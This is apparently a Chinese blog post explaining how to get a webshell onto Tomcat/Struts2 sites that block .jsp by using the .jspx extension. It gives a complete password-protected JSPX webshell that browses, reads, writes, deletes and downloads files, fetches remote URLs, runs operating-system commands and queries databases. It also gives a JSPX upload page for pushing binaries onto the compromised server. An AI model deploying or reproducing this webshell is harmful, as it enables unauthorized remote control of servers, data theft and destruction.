zoukankan      html  css  js  c++  java
  • 利用jspx解决jsp后缀被限制拿shell

    有些struts2的站在web.xml里面设置url是jsp的格式就自动跳转主页的action,转换jsp后缀大小写还不解析。查了查有Tomcat默认jspx可以解析。看了看jspx的手册,那就好说了。
    
    
    
    jspx一句话(密码HACKBLOG,可自行更改):
    
    1
      <jsp:root xmlns:jsp="http://java.sun.com/JSP/Page" xmlns="http://www.w3.org/1999/xhtml" xmlns:c="http://java.sun.com/jsp/jstl/core" version="1.2"><jsp:directive.page contentType="text/html" pageEncoding="UTF-8" /><jsp:directive.page import="java.io.*"/><jsp:directive.page import="java.util.*"/><jsp:directive.page import="java.net.*"/><jsp:directive.page import="java.sql.*"/><jsp:directive.page import="java.text.*"/><jsp:declaration>String Pwd="HACKBLOG";String cs="UTF-8";String EC(String s)throws Exception{return new String(s.getBytes("ISO-8859-1"),cs);}Connection GC(String s)throws Exception{String[] x=s.trim().split("
    ");Class.forName(x[0].trim());if(x[1].indexOf("jdbc:oracle")!=-1){return DriverManager.getConnection(x[1].trim()+":"+x[4],x[2].equalsIgnoreCase("[/null]")?"":x[2],x[3].equalsIgnoreCase("[/null]")?"":x[3]);}else{Connection c=DriverManager.getConnection(x[1].trim(),x[2].equalsIgnoreCase("[/null]")?"":x[2],x[3].equalsIgnoreCase("[/null]")?"":x[3]);if(x.length>4){c.setCatalog(x[4]);}return c;}}void AA(StringBuffer sb)throws Exception{File r[]=File.listRoots();for(int i=0;i&lt;r.length;i++){sb.append(r[i].toString().substring(0,2));}}void BB(String s,StringBuffer sb)throws Exception{File oF=new File(s),l[]=oF.listFiles();String sT,sQ,sF="";java.util.Date dt;SimpleDateFormat fm=new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");for(int i=0; i&lt;l.length; i++){dt=new java.util.Date(l[i].lastModified());sT=fm.format(dt);sQ=l[i].canRead()?"R":"";sQ +=l[i].canWrite()?" W":"";if(l[i].isDirectory()){sb.append(l[i].getName()+"/	"+sT+"	"+l[i].length()+"	"+sQ+"
    ");}else{sF+=l[i].getName()+"	"+sT+"	"+l[i].length()+"	"+sQ+"
    ";}}sb.append(sF);}void EE(String s)throws Exception{File f=new File(s);if(f.isDirectory()){File x[]=f.listFiles();for(int k=0; k &lt; x.length; k++){if(!x[k].delete()){EE(x[k].getPath());}}}f.delete();}void FF(String s,HttpServletResponse r)throws Exception{int n;byte[] b=new byte[512];r.reset();ServletOutputStream os=r.getOutputStream();BufferedInputStream is=new BufferedInputStream(new FileInputStream(s));os.write(("->"+"|").getBytes(),0,3);while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}os.write(("|"+"&lt;-").getBytes(),0,3);os.close();is.close();}void GG(String s,String d)throws Exception{String h="0123456789ABCDEF";File f=new File(s);f.createNewFile();FileOutputStream os=new FileOutputStream(f);for(int i=0; i&lt;d.length();i+=2){os.write((h.indexOf(d.charAt(i)) &lt;&lt; 4 | h.indexOf(d.charAt(i+1))));}os.close();}void HH(String s,String d)throws Exception{File sf=new File(s),df=new File(d);if(sf.isDirectory()){if(!df.exists()){df.mkdir();}File z[]=sf.listFiles();for(int j=0; j&lt;z.length; j++){HH(s+"/"+z[j].getName(),d+"/"+z[j].getName());}}else{FileInputStream is=new FileInputStream(sf);FileOutputStream os=new FileOutputStream(df);int n;byte[] b=new byte[512];while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}is.close();os.close();}}void II(String s,String d)throws Exception{File sf=new File(s),df=new File(d);sf.renameTo(df);}void JJ(String s)throws Exception{File f=new File(s);f.mkdir();}void KK(String s,String t)throws Exception{File f=new File(s);SimpleDateFormat fm=new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");java.util.Date dt=fm.parse(t);f.setLastModified(dt.getTime());}void LL(String s,String d)throws Exception{URL u=new URL(s);int n=0;FileOutputStream os=new FileOutputStream(d);HttpURLConnection h=(HttpURLConnection) u.openConnection();InputStream is=h.getInputStream();byte[] b=new byte[512];while((n=is.read(b))!=-1){os.write(b,0,n);}os.close();is.close();h.disconnect();}void MM(InputStream is,StringBuffer sb)throws Exception{String l;BufferedReader br=new BufferedReader(new InputStreamReader(is));while((l=br.readLine())!=null){sb.append(l+"
    ");}}void NN(String s,StringBuffer sb)throws Exception{Connection c=GC(s);ResultSet r=s.indexOf("jdbc:oracle")!=-1?c.getMetaData().getSchemas():c.getMetaData().getCatalogs();while(r.next()){sb.append(r.getString(1)+"	");}r.close();c.close();}void OO(String s,StringBuffer sb)throws Exception{Connection c=GC(s);String[] x=s.trim().split("
    ");ResultSet r=c.getMetaData().getTables(null,s.indexOf("jdbc:oracle")!=-1?x.length>5?x[5]:x[4]:null,"%",new String[]{"TABLE"});while(r.next()){sb.append(r.getString("TABLE_NAME")+"	");}r.close();c.close();}void PP(String s,StringBuffer sb)throws Exception{String[] x=s.trim().split("
    ");Connection c=GC(s);Statement m=c.createStatement(1005,1007);ResultSet r=m.executeQuery("select * from "+x[x.length-1]);ResultSetMetaData d=r.getMetaData();for(int i=1;i&lt;=d.getColumnCount();i++){sb.append(d.getColumnName(i)+" ("+d.getColumnTypeName(i)+")	");}r.close();m.close();c.close();}void QQ(String cs,String s,String q,StringBuffer sb,String p)throws Exception{Connection c=GC(s);Statement m=c.createStatement(1005,1008);BufferedWriter bw=null;try{ResultSet r=m.executeQuery(q.indexOf("--f:")!=-1?q.substring(0,q.indexOf("--f:")):q);ResultSetMetaData d=r.getMetaData();int n=d.getColumnCount();for(int i=1; i &lt;=n; i++){sb.append(d.getColumnName(i)+"	|	");}sb.append("
    ");if(q.indexOf("--f:")!=-1){File file=new File(p);if(q.indexOf("-to:")==-1){file.mkdir();}bw=new BufferedWriter(new OutputStreamWriter(new FileOutputStream(new File(q.indexOf("-to:")!=-1?p.trim():p+q.substring(q.indexOf("--f:")+4,q.length()).trim()),true),cs));}while(r.next()){for(int i=1; i&lt;=n;i++){if(q.indexOf("--f:")!=-1){bw.write(r.getObject(i)+""+"	");bw.flush();}else{sb.append(r.getObject(i)+""+"	|	");}}if(bw!=null){bw.newLine();}sb.append("
    ");}r.close();if(bw!=null){bw.close();}}catch(Exception e){sb.append("Result	|	
    ");try{m.executeUpdate(q);sb.append("Execute Successfully!	|	
    ");}catch(Exception ee){sb.append(ee.toString()+"	|	
    ");}}m.close();c.close();}</jsp:declaration><jsp:scriptlet>cs=request.getParameter("z0")!=null?request.getParameter("z0")+"":cs;response.setContentType("text/html");response.setCharacterEncoding(cs);StringBuffer sb=new StringBuffer("");try{String Z=EC(request.getParameter(Pwd)+"");String z1=EC(request.getParameter("z1")+"");String z2=EC(request.getParameter("z2")+"");sb.append("->"+"|");String s=request.getSession().getServletContext().getRealPath("/");if(Z.equals("A")){sb.append(s+"	");if(!s.substring(0,1).equals("/")){AA(sb);}}else if(Z.equals("B")){BB(z1,sb);}else if(Z.equals("C")){String l="";BufferedReader br=new BufferedReader(new InputStreamReader(new FileInputStream(new File(z1))));while((l=br.readLine())!=null){sb.append(l+"
    ");}br.close();}else if(Z.equals("D")){BufferedWriter bw=new BufferedWriter(new OutputStreamWriter(new FileOutputStream(new File(z1))));bw.write(z2);bw.close();sb.append("1");}else if(Z.equals("E")){EE(z1);sb.append("1");}else if(Z.equals("F")){FF(z1,response);}else if(Z.equals("G")){GG(z1,z2);sb.append("1");}else if(Z.equals("H")){HH(z1,z2);sb.append("1");}else if(Z.equals("I")){II(z1,z2);sb.append("1");}else if(Z.equals("J")){JJ(z1);sb.append("1");}else if(Z.equals("K")){KK(z1,z2);sb.append("1");}else if(Z.equals("L")){LL(z1,z2);sb.append("1");}else if(Z.equals("M")){String[] c={z1.substring(2),z1.substring(0,2),z2};Process p=Runtime.getRuntime().exec(c);MM(p.getInputStream(),sb);MM(p.getErrorStream(),sb);}else if(Z.equals("N")){NN(z1,sb);}else if(Z.equals("O")){OO(z1,sb);}else if(Z.equals("P")){PP(z1,sb);}else if(Z.equals("Q")){QQ(cs,z1,z2,sb,z2.indexOf("-to:")!=-1?z2.substring(z2.indexOf("-to:")+4,z2.length()):s.replaceAll("\\","/")+"images/");}}catch(Exception e){sb.append("ERROR"+":// "+e.toString());}sb.append("|"+"&lt;-");out.print(sb.toString());</jsp:scriptlet></jsp:root>
    JSPX文件上传(解决菜刀上传二进制文件失败问题)
    
    up.html
    
    1
    2
    3
    4
    5
    6
    7
    8
    9
    <html>
    <title>upload</title>
    <body>
    <form action="up.jspx" method="post" enctype="multipart/form-data">
    <input type="file" name="upfile" size="50">
    <input type="submit" value="submit">
    </form>
    </body>
    </html>
    up.jspx(默认保存上传当前目录下的upload目录,可自行更改):
    
    
    <jsp:root xmlns:jsp="http://java.sun.com/JSP/Page"
              xmlns="http://www.w3.org/1999/xhtml"
              xmlns:c="http://java.sun.com/jsp/jstl/core" version="1.2">
        <jsp:directive.page contentType="text/html" pageEncoding="utf-8"/>
        <jsp:directive.page import="java.io.*"/>
        <jsp:directive.page import="java.util.*"/>
        <jsp:directive.page import="javax.servlet.*"/>
        <jsp:directive.page import="javax.servlet.http.*"/>
    <html><head><title>upFile</title></head>
    <body bgcolor="#ffffff">
    <jsp:scriptlet>
    int MAX_SIZE = 102400 * 102400;
    String rootPath;
    DataInputStream in = null;
    FileOutputStream fileOut = null;
    String remoteAddr = request.getRemoteAddr();
    String serverName = request.getServerName();
    String realPath = request.getRealPath(serverName);
    realPath = realPath.substring(0,realPath.lastIndexOf("\"));
    rootPath = realPath + "\upload\";
    String contentType = request.getContentType();
    try{
    if(contentType.indexOf("multipart/form-data") >= 0){
    in = new DataInputStream(request.getInputStream());
    int formDataLength = request.getContentLength();
    if(formDataLength > MAX_SIZE){
    out.println("No more than" + MAX_SIZE + "");
    return;
    }
    byte dataBytes[] = new byte[formDataLength];
    int byteRead = 0;
    int totalBytesRead = 0;
    while(totalBytesRead != formDataLength){
    byteRead = in.read(dataBytes,totalBytesRead,formDataLength);
    totalBytesRead += byteRead;
    }
    String file = new String(dataBytes);
    //out.println(file);
    String saveFile = file.substring(file.indexOf("filename="") + 10);
    saveFile = saveFile.substring(0,saveFile.indexOf("
    "));
    saveFile = saveFile.substring(saveFile.lastIndexOf("\") + 1,saveFile.indexOf("""));
    int lastIndex = contentType.lastIndexOf("=");
    String boundary = contentType.substring(lastIndex + 1,contentType.length());
    String fileName = rootPath + saveFile;
    //out.print(fileName);
    int pos;
    pos = file.indexOf("filename="");
    pos = file.indexOf("
    ",pos) + 1;
    pos = file.indexOf("
    ",pos) + 1;
    pos = file.indexOf("
    ",pos) + 1;
    int boundaryLocation = file.indexOf(boundary,pos) - 4;
    //out.println(boundaryLocation);
    int startPos = ((file.substring(0,pos)).getBytes()).length;
    //out.println(startPos);
    int endPos = ((file.substring(0,boundaryLocation)).getBytes()).length;
    //out.println(endPos);
    File checkFile = new File(fileName);
    if(checkFile.exists()){
    out.println("" + saveFile + "already exist.");
    }
    File fileDir = new File(rootPath);
    if(!fileDir.exists()){
    fileDir.mkdirs();
    }
    fileOut = new FileOutputStream(fileName);
    fileOut.write(dataBytes,startPos,(endPos - startPos));
    fileOut.close();
    out.println(saveFile + "succeed.");
    }else{
    String content = request.getContentType();
    out.println("error:multipart/form-data");
    }
    }catch(Exception ex){
    throw new ServletException(ex.getMessage());
    }
    </jsp:scriptlet>
    </body>
    </html>
    </jsp:root>
  • 相关阅读:
    net core 使用 rabbitmq
    asp.net core WebApi 返回 HttpResponseMessage
    asp.net core 2.1 WebApi 快速入门
    JQuery EasyUI combobox动态添加option
    php截取字符去掉最后一个字符
    JQuery EasyUI Combobox的onChange事件
    对于不返回任何键列信息的 selectcommand 不支持 updatecommand 的动态 sql 生成
    Access2007 操作或事件已被禁用模式阻止解决办法
    Easyui 中 Tabsr的常用方法
    Win 7 IE11不能下载文件,右键另存为也不行
  • 原文地址:https://www.cnblogs.com/dongchi/p/5174774.html
Copyright © 2011-2022 走看看